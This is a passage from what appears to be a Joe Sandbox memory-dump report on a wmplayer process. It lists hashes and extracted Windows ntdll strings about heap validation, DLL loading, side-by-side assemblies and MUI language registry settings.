                                              • Opcode ID: a2c367242470f232b72bf2fbf43497593eb014ed3f8889862d6a34564c0e66b5
                                              • Instruction ID: a72209bc263e4205ed9b19c0fc9502fdc4b47c7f6061f225f928c5608026fc8b
                                              • Opcode Fuzzy Hash: a2c367242470f232b72bf2fbf43497593eb014ed3f8889862d6a34564c0e66b5
                                              • Instruction Fuzzy Hash: 508170B1E10388EFEB10CF95C885BAEBBF9BB09714F144159F519BB641D375A980CB60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              • Opcode ID: 7a714129c49cced4be26b0135bafc93bfffdacf6084096a07752edcde6b9d61d
                                              • Instruction ID: 3dced8d818fb33245be04c9dbbc4ed2e0209c252f3802814818b4ee24ed5d1b3
                                              • Opcode Fuzzy Hash: 7a714129c49cced4be26b0135bafc93bfffdacf6084096a07752edcde6b9d61d
                                              • Instruction Fuzzy Hash: 16128C34A10741DFD725EF28C881BBAFBF5EF09714F188959E4968BA42D774E882CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                              • API String ID: 0-3532704233
                                              • Opcode ID: 7bf7492a905bbd07eaf80a9b18a0488089069ee12572ff2fe8990a04f297552c
                                              • Instruction ID: 2b884857b925d11e41a749ca67aa822b6ce1a2b69d71eb266fe51e0913419bde
                                              • Opcode Fuzzy Hash: 7bf7492a905bbd07eaf80a9b18a0488089069ee12572ff2fe8990a04f297552c
                                              • Instruction Fuzzy Hash: E7B181719283959FC725DF24C880A6BFBE8AF88754F054A3EF989D7240D770D984CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              • Opcode ID: 110ad15545368a813eb536d07c8dbae33c59a0e1a933402ca1b0de909c052a8d
                                              • Instruction ID: 51462567d45bb69a117cce33d398a24b80f24760114da5474883a9b97860296c
                                              • Opcode Fuzzy Hash: 110ad15545368a813eb536d07c8dbae33c59a0e1a933402ca1b0de909c052a8d
                                              • Instruction Fuzzy Hash: 87D10272805315AFD721DE54C8C1B6FF7ECAF84B24F448929FA849B154E7B0C9448BE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 0-1700792311
                                              • Opcode ID: e3066ebd2853c70d8898d5e300c005d4f9b489e7c3aa5000d31ebd7d8c0a2106
                                              • Instruction ID: f2260642e77099eaaafc22df8d9a74af9f603cd88e44d0045a218a9b5ca56b6c
                                              • Opcode Fuzzy Hash: e3066ebd2853c70d8898d5e300c005d4f9b489e7c3aa5000d31ebd7d8c0a2106
                                              • Instruction Fuzzy Hash: D1D1F035520785EFCB1AEF68C891AADFBF5FF4A710F088049E4559BA52C774A988CF10
                                              Strings
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 032CD262
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 032CD2C3
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 032CD146
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 032CD0CF
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 032CD196
                                              • @, xrefs: 032CD313
                                              • @, xrefs: 032CD2AF
                                              • @, xrefs: 032CD0FD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1356375266
                                              • Opcode ID: cb9d12b86e972e3832a7db6f3cca76bdb63cf27b5ed16506d0e8107bba0b7ba5
                                              • Instruction ID: 77840197a593043c03ed5ad1201d5340aaf9143bab82db35fb17e59116bc295b
                                              • Opcode Fuzzy Hash: cb9d12b86e972e3832a7db6f3cca76bdb63cf27b5ed16506d0e8107bba0b7ba5
                                              • Instruction Fuzzy Hash: 26A13B719283559FD721DF25C880B5BFBE8BB84715F004A2EF9989A240D7B4D948CF93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              • Opcode ID: 6779208e8ed3179971a64dc67463511c49ca8e7dd743fe378044c3330c01a7ad
                                              • Instruction ID: d3d41d99bc17cfaf19d91dfb8f1e8eff4c49c6485065d57ef963ea665de5c9d7
                                              • Opcode Fuzzy Hash: 6779208e8ed3179971a64dc67463511c49ca8e7dd743fe378044c3330c01a7ad
                                              • Instruction Fuzzy Hash: DC420235638381AFC714DF28C984A2AFBEAFF84704F184A6DE4958B351D774E885CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              • Opcode ID: 2e202f66969b20aca2bb12b477430289933d14b8bb3f85391b51332efe17c46b
                                              • Instruction ID: 2a0301ff7001290be29b8e9c5d4cac320f314b7f2f5608e77004160a67999246
                                              • Opcode Fuzzy Hash: 2e202f66969b20aca2bb12b477430289933d14b8bb3f85391b51332efe17c46b
                                              • Instruction Fuzzy Hash: F8C14A35A28315ABDF24DB68C8D3BBEB7A5AF46310F588069E8019F690D7F4D9C4C391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-792281065
                                              • Opcode ID: 82a90e3db661dad7344f495364a5cacd252254fefa13b88afffac0b15cbc033e
                                              • Instruction ID: 0f99ab207ae2da3736d5a98fc7b1abd0e23d8578f2c09580b2d67dcc3c7a3658
                                              • Opcode Fuzzy Hash: 82a90e3db661dad7344f495364a5cacd252254fefa13b88afffac0b15cbc033e
                                              • Instruction Fuzzy Hash: 34912474E103149BEB24EF55DCDABAEB7E8EF41B24F180129E8116B6C5D7B4B881C790
                                              Strings
                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03342180
                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0334219F
                                              • RtlGetAssemblyStorageRoot, xrefs: 03342160, 0334219A, 033421BA
                                              • SXS: %s() passed the empty activation context, xrefs: 03342165
                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03342178
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 033421BF
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                              • API String ID: 0-861424205
                                              • Opcode ID: f47e0b7305c9912f306b35e33e40ebf7ebeadb46a653b487c29c0d1675a7b130
                                              • Instruction ID: 517d90f0cc50212b12d2207799411f261569a9432a468cae85065df910045dae
                                              • Opcode Fuzzy Hash: f47e0b7305c9912f306b35e33e40ebf7ebeadb46a653b487c29c0d1675a7b130
                                              • Instruction Fuzzy Hash: 21310636F40214ABE721CA999CD5F9FB6B8DF94F90F090459BA05FB182D270EA40C7A1
                                              Strings
                                              • LdrpInitializeImportRedirection, xrefs: 03348177, 033481EB
                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 033481E5
                                              • minkernel\ntdll\ldrinit.c, xrefs: 0330C6C3
                                              • Loading import redirection DLL: '%wZ', xrefs: 03348170
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03348181, 033481F5
                                              • LdrpInitializeProcess, xrefs: 0330C6C4
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 0-475462383
                                              • Opcode ID: 2585237284ba301f71db7403a7a4129675f1712267572bdf71c971658528b573
                                              • Instruction ID: 37282bd2354945e50d37c877a896240e9d0f2f53f767a259f4a0c3b8d7f3d749
                                              • Opcode Fuzzy Hash: 2585237284ba301f71db7403a7a4129675f1712267572bdf71c971658528b573
                                              • Instruction Fuzzy Hash: A9310779A543459FC214EF28DDD5E1EB7E4EF84B10F050658F9416F291D660FC44C7A2
                                              Strings
                                              • Kernel-MUI-Number-Allowed, xrefs: 032F5247
                                              • Kernel-MUI-Language-SKU, xrefs: 032F542B
                                              • Kernel-MUI-Language-Disallowed, xrefs: 032F5352
                                              • Kernel-MUI-Language-Allowed, xrefs: 032F527B
                                              • WindowsExcludedProcs, xrefs: 032F522A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 9e54289b88fb1fe685bfd3a5feed9e009d92eda213d9fcdc9230eae2de226ffe
                                              • Instruction ID: 27cf3da0b2ecf522f3e467a86feacc89780cf8b0bd7b174b90870ab84169fb6e
                                              • Opcode Fuzzy Hash: 9e54289b88fb1fe685bfd3a5feed9e009d92eda213d9fcdc9230eae2de226ffe
                                              • Instruction Fuzzy Hash: 15F14D76D20629EFCB15DF98C9809EEFBFDFF49650F25406AE501AB210D7709E418B90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1975516107
                                              • Opcode ID: 54da594a7568d8b44f2c996efb8d661267ccb6face6652da69d3c1b1702fdd45
                                              • Instruction ID: 996560effc470ba0d1ab92f97cabd7fb60df8df33e84d26bc726f0fe77094a12
                                              • Opcode Fuzzy Hash: 54da594a7568d8b44f2c996efb8d661267ccb6face6652da69d3c1b1702fdd45
                                              • Instruction Fuzzy Hash: 24510175E2434ADFDB10EFA8E58579DFBB1BF48314F188169C5016B299C7B0A8C2CB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                              • API String ID: 0-3061284088
                                              • Opcode ID: 31ff02192d1a2b290e76511a61e11315be5aded2e3759a9a1b92eaca0d27dcb9
                                              • Instruction ID: 18d340a73cfbf8a174850067eb8b25704b70fcba7e848402359325096c07faa7
                                              • Opcode Fuzzy Hash: 31ff02192d1a2b290e76511a61e11315be5aded2e3759a9a1b92eaca0d27dcb9
                                              • Instruction Fuzzy Hash: 3D01DD36134790DFD226D71C985AF66FBD8DB42B30F28815DE0515BD51CAE858C0C664
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 332a66fa3b1659e4cae41f31625d618877c2068c77a1d78c0babce5d19365096
                                              • Instruction ID: a18f9c43bffac23287f2a054fbb520af5b8b99b4f135ba7695848e003da5a642
                                              • Opcode Fuzzy Hash: 332a66fa3b1659e4cae41f31625d618877c2068c77a1d78c0babce5d19365096
                                              • Instruction Fuzzy Hash: B813E170A20656DFDB24CF68C4817A9FBF1FF49704F5881A9D899AB381D774A881CF90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-3570731704
                                              • Opcode ID: 72d077f73c7f159c04837e1c5b4258f71784753f0480727b759aff8d52d1200e
                                              • Instruction ID: 6bad834916aec5b63eadde1cee73f512213ef0717449c61987f67ed06d57b73d
                                              • Opcode Fuzzy Hash: 72d077f73c7f159c04837e1c5b4258f71784753f0480727b759aff8d52d1200e
                                              • Instruction Fuzzy Hash: 7E924A75A21269CFEB24CF18CC91BA9B7B5BF45310F0981EAD849AB250D774AEC0CF51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                              • API String ID: 0-379654539
                                              • Opcode ID: b01daa6d0b0125e5a323249a307e85a0c99a16e1c35706ae5b1485f7ca317e05
                                              • Instruction ID: 46e508dbe8b34f8b2d6d5cf3e8031e2d830086de48093cf7c9c4304d70cc2011
                                              • Opcode Fuzzy Hash: b01daa6d0b0125e5a323249a307e85a0c99a16e1c35706ae5b1485f7ca317e05
                                              • Instruction Fuzzy Hash: 60C16975528382CFC721CF18C484B6BB7E4BF85704F04896AF896CB250E774CA89CB92
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 033422B6
                                              • .Local, xrefs: 033028D8
                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 033421D9, 033422B1
                                              • SXS: %s() passed the empty activation context, xrefs: 033421DE
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                              • API String ID: 0-1239276146
                                              • Opcode ID: 767889548566360e26d83a520334040ff97f350d37a6b3ec9a708760de55ad1e
                                              • Instruction ID: 3e669fd251158d13087a12ef2a7796897905257d0fa50f57f086c6f5b533186b
                                              • Opcode Fuzzy Hash: 767889548566360e26d83a520334040ff97f350d37a6b3ec9a708760de55ad1e
                                              • Instruction Fuzzy Hash: D0A182359002299BCB24CF54CCD8BAAB3B5BF58314F1945E9E848EB691D730AEC0CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              • Opcode ID: 103f588cb62d455c9ceb68664aaeddb47d421ca8fef7574437bfd4d1fc485213
                                              • Instruction ID: da47d9fcf84df27939f230cdfa378f5acc0ca1e4000c51cd86384a6b91fc73bc
                                              • Opcode Fuzzy Hash: 103f588cb62d455c9ceb68664aaeddb47d421ca8fef7574437bfd4d1fc485213
                                              • Instruction Fuzzy Hash: B7613636224780AFD721DB68CD86F27BBE9FF80714F180569FA658B291D774D880CB61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 0-336120773
                                              • Opcode ID: 75ec7c8339630b1f3f2e17faafcabea51b6fbb189411ce7876b4111faca2c614
                                              • Instruction ID: 0a0293e9bb12c0f58744dbd81c6703e571a7d778b93b0b3e1ee84472ccdafe2c
                                              • Opcode Fuzzy Hash: 75ec7c8339630b1f3f2e17faafcabea51b6fbb189411ce7876b4111faca2c614
                                              • Instruction Fuzzy Hash: D231F435A20750EFCB10EB98CCC6F6AB3E9EF09720F184559F441DB652D670AD81CA55
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              • Opcode ID: d7b6020b03535b9e230a3ea7e340fc6dcc123b7b76646496e3a0a5c75bbab324
                                              • Instruction ID: 59ae0ab60e82170a2a157f27bb1572c2055f40a8fb0a33748642f4202f01e54f
                                              • Opcode Fuzzy Hash: d7b6020b03535b9e230a3ea7e340fc6dcc123b7b76646496e3a0a5c75bbab324
                                              • Instruction Fuzzy Hash: 8C31E336A20294EFCB01DB49C885FAEFBBCEF45B20F154155E814AB691D7B0E9C0CA60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              • Opcode ID: eb9b82d3c8fb0ee7919de818adffaba782f6d0fb760f777c1b03df2764f57be6
                                              • Instruction ID: 89150c04591f83a78673957130aace38156006417c189a222d912402905956ca
                                              • Opcode Fuzzy Hash: eb9b82d3c8fb0ee7919de818adffaba782f6d0fb760f777c1b03df2764f57be6
                                              • Instruction Fuzzy Hash: 90F1C034A10606DFEB14CF69C895B6AB7F9FF46700F1881A8E416DB341D7B4E982CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                              • API String ID: 0-1145731471
                                              • Opcode ID: 2937127d0669c62a91f69c16a5abcdaa9a1e4d9b656ffaffb5dc8a47a05cb923
                                              • Instruction ID: 26f1f6304a29bf245e6be1bc1a28cf856dbc7ed7e43d106492e19c8767ffb2f3
                                              • Opcode Fuzzy Hash: 2937127d0669c62a91f69c16a5abcdaa9a1e4d9b656ffaffb5dc8a47a05cb923
                                              • Instruction Fuzzy Hash: EDB1BC3AE246458BDB25CF68C8D0BADB7B5EF45721F19C929E851EB380D370E884CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                              • API String ID: 0-2391371766
                                              • Opcode ID: a29792c652f3d56923f46dbd3e96b2175dbeab103fff6f64a34aea2780b8b99c
                                              • Instruction ID: 5b409ab2a0677564a2633c96f36fced9dccc0deb060bcfda1e1e2bf418b36099
                                              • Opcode Fuzzy Hash: a29792c652f3d56923f46dbd3e96b2175dbeab103fff6f64a34aea2780b8b99c
                                              • Instruction Fuzzy Hash: 85B19CBAA14345AFE711DE54CCC1F6BB7ECEB447A0F084929FA519B280D770E844CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: FilterFullPath$UseFilter$\??\
                                              • API String ID: 0-2779062949
                                              • Opcode ID: 153efb537fd16247ca5dc4c6f921ee65e52b17ab06ca6b868a9ccc83ef77fa09
                                              • Instruction ID: 0c25bb7673b93d149bd68ffd61275d4912cba0d1cb2cd06c23e1d5d892059bf6
                                              • Opcode Fuzzy Hash: 153efb537fd16247ca5dc4c6f921ee65e52b17ab06ca6b868a9ccc83ef77fa09
                                              • Instruction Fuzzy Hash: AAA179759212299BDB21DF24CCC8BAEB7B8EF44710F1441E9E909AB250D735AEC4CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                              • API String ID: 0-318774311
                                              • Opcode ID: 2dcaec5d84021c011e27c7e5fada7228a49fa4d3971b98fa4bbcede329c18339
                                              • Instruction ID: 0f7cb21f5b52393d7f08037783f4f17c45dd5e2a3dd26672870d644b6a264a4a
                                              • Opcode Fuzzy Hash: 2dcaec5d84021c011e27c7e5fada7228a49fa4d3971b98fa4bbcede329c18339
                                              • Instruction Fuzzy Hash: D9818879608340AFE311DB14C884B6AB7E8EF85760F08896DF9919B3A4D774E944CB62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              • Opcode ID: 1c44cf4ac9d933b4e373e667e192f257926214363335671daf609548d64ea5e1
                                              • Instruction ID: b992b8778cb7e6b88e1c9b52bab97c1be3ea3a7f2c06c49d59d51c56ff823b83
                                              • Opcode Fuzzy Hash: 1c44cf4ac9d933b4e373e667e192f257926214363335671daf609548d64ea5e1
                                              • Instruction Fuzzy Hash: 0471AF74A083059FD714DF24C9E0B2BFBE9BF85618F14891DE4968B6A2C730E905CB92
                                              Strings
                                              • TargetNtPath, xrefs: 033AB82F
                                              • GlobalizationUserSettings, xrefs: 033AB834
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 033AB82A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              • Opcode ID: 6fb7b61f687b66ed8ff62d1a399c6e885dcd16aafcbf23f11346570e84f4994e
                                              • Instruction ID: 63097017e61b4ac1c2c805eadb79484370765737142e628ad64be1f66853ac62
                                              • Opcode Fuzzy Hash: 6fb7b61f687b66ed8ff62d1a399c6e885dcd16aafcbf23f11346570e84f4994e
                                              • Instruction Fuzzy Hash: 53616E72951A29AFDB21DB58DC88B9AF7B8EF04710F0501E9A509AB250DB74DE80CF90
                                              Strings
